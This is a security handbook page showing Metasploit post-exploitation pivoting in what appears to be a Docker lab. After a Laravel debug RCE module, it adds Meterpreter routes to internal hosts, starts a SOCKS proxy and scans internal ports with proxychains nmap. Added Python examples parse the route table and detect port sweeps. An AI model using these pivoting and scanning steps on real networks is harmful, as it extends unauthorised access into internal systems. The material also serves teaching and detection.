handbook/tools/4.Exploitation/Metasploit/Modules/Services/Proxy.md
2024-08-31 01:07:22 +02:00


## Command
Routing the service
```
# Traffic to the discovered webservice_database IP will be routed through the Meterpreter session
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.28.101.51/32 -1
[*] Route added
```
- website_database ---> This hostname comes from the .env variable in the Docker file ()
Routing the host machine
```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.17.0.1/32 -1
[*] Route added
```
Check the routing table
```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
172.17.0.1 255.255.255.255 Session 3
172.28.101.51 255.255.255.255 Session 3
[*] There are currently no IPv6 routes defined.
```
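To make the `route print` table above concrete, here is an added example (not part of the handbook or of Metasploit) that parses that exact output and answers, for any destination address, which session a connection would be pivoted through. It models the selection as a longest-prefix match over the table, which is an assumption about Metasploit's internal router; the point it illustrates is that the two /32 routes confine the pivot to exactly those two hosts, and every other address is still contacted directly from the attacker's machine.

```python
from ipaddress import ip_address, ip_network

# The `route print` output from the page, embedded verbatim as sample input
ROUTE_PRINT = """\
IPv4 Active Routing Table
=========================

   Subnet         Netmask          Gateway
   ------         -------          -------
   172.17.0.1     255.255.255.255  Session 3
   172.28.101.51  255.255.255.255  Session 3

[*] There are currently no IPv6 routes defined.
"""


def parse_route_print(text):
    """Return [(ip_network, gateway)] for every data row of a `route print` table.

    Header, separator and status lines are skipped because their first two
    fields do not form a valid address/netmask pair.
    """
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        try:
            net = ip_network(f"{parts[0]}/{parts[1]}", strict=False)
        except ValueError:
            continue  # not a route row (e.g. "Subnet Netmask Gateway")
        routes.append((net, " ".join(parts[2:])))
    return routes


def select_route(routes, dst):
    """Longest-prefix match (assumed model of the router): return the gateway
    label for dst, or None when no route matches and traffic goes direct."""
    addr = ip_address(dst)
    best = None
    for net, gateway in routes:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, gateway)
    return best[1] if best else None


def pivoted_hosts(routes, hosts):
    """Map each candidate host to its gateway label (None = direct)."""
    return {h: select_route(routes, h) for h in hosts}


if __name__ == "__main__":
    table = parse_route_print(ROUTE_PRINT)
    for host, via in pivoted_hosts(table, ["172.17.0.1", "172.28.101.51", "172.17.0.2"]).items():
        print(f"{host:15} -> {via or 'direct'}")
```

Because both entries carry a 255.255.255.255 netmask, `172.17.0.2` (one address away from the routed Docker gateway) resolves to `direct`, which is usually what an operator wants to verify before trusting a scan result that came back through the proxy.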
Set up the SOCKS proxy
```
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
```
Reaching the target machine through the proxy
```
# From the attacker's host machine, curl against the internal Docker IP shows that the web application is running and that the SOCKS proxy works
$ curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v
… etc …
# From the attacker's host machine, ProxyChains lets nmap scan the compromised host machine for common ports
$ proxychains -q nmap -n -sT -Pn -p 22,80,443,5432 172.17.0.1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 08:48 EDT
Nmap scan report for 172.17.0.1
Host is up (0.069s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp closed https
5432/tcp closed postgresql
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
```
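From the compromised host's point of view, the proxychained nmap run above is a burst of TCP connection attempts from one container toward the Docker gateway on several different ports within a fraction of a second. The following added example (not from the handbook or from any real host's logs) runs a simple sweep detector over constructed log lines written in the style of iptables LOG output; the pivot container address 172.28.101.10 and the benign 172.28.101.20 are placeholders, since the page does not name the compromised container's IP.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (iptables LOG style). The first four mirror the
# nmap sweep of ports 22,80,443,5432 against 172.17.0.1 seen on the page;
# the rest are ordinary traffic that should not trigger an alert.
SAMPLE_LOG = """\
Oct 24 08:48:01 dockerhost kernel: DOCKER-IN: IN=docker0 SRC=172.28.101.10 DST=172.17.0.1 PROTO=TCP SPT=41022 DPT=22 SYN
Oct 24 08:48:01 dockerhost kernel: DOCKER-IN: IN=docker0 SRC=172.28.101.10 DST=172.17.0.1 PROTO=TCP SPT=41023 DPT=80 SYN
Oct 24 08:48:02 dockerhost kernel: DOCKER-IN: IN=docker0 SRC=172.28.101.10 DST=172.17.0.1 PROTO=TCP SPT=41024 DPT=443 SYN
Oct 24 08:48:02 dockerhost kernel: DOCKER-IN: IN=docker0 SRC=172.28.101.10 DST=172.17.0.1 PROTO=TCP SPT=41025 DPT=5432 SYN
Oct 24 08:48:03 dockerhost kernel: DOCKER-IN: IN=docker0 SRC=172.28.101.20 DST=172.17.0.1 PROTO=TCP SPT=50001 DPT=80 SYN
Oct 24 08:48:09 dockerhost kernel: DOCKER-IN: IN=docker0 SRC=172.28.101.20 DST=172.17.0.1 PROTO=TCP SPT=50002 DPT=80 SYN
Oct 24 08:48:10 dockerhost kernel: DOCKER-IN: IN=docker0 SRC=172.28.101.20 DST=172.28.101.51 PROTO=TCP SPT=50003 DPT=5432 SYN
Oct 24 08:48:15 dockerhost kernel: DOCKER-IN: IN=docker0 SRC=172.28.101.20 DST=172.28.101.51 PROTO=TCP SPT=50004 DPT=5432 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)


def parse_log(text):
    """Extract (timestamp, src, dst, dport) from each TCP LOG line; skip the rest."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
            events.append((ts, m["src"], m["dst"], int(m["dpt"])))
    return events


def detect_port_sweeps(events, window=timedelta(seconds=5), min_ports=4):
    """Flag (src, dst) pairs that touch >= min_ports distinct ports within `window`.

    Returns {(src, dst): sorted list of ports seen in the triggering window}.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, dpt in events:
        by_pair[(src, dst)].append((ts, dpt))

    alerts = {}
    for pair, hits in by_pair.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - start <= window}
            if len(ports) >= min_ports:
                alerts[pair] = sorted(ports)
                break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for (src, dst), ports in detect_port_sweeps(parse_log(SAMPLE_LOG)).items():
        print(f"possible sweep {src} -> {dst}: ports {ports}")
```

The threshold of four distinct ports inside five seconds is deliberately low so the page's own four-port scan is caught; on a real Docker host the same logic can be fed from conntrack or flow logs, and a container that suddenly reaches the gateway on ports it never used before is the signal worth correlating with the Meterpreter session's outbound connection.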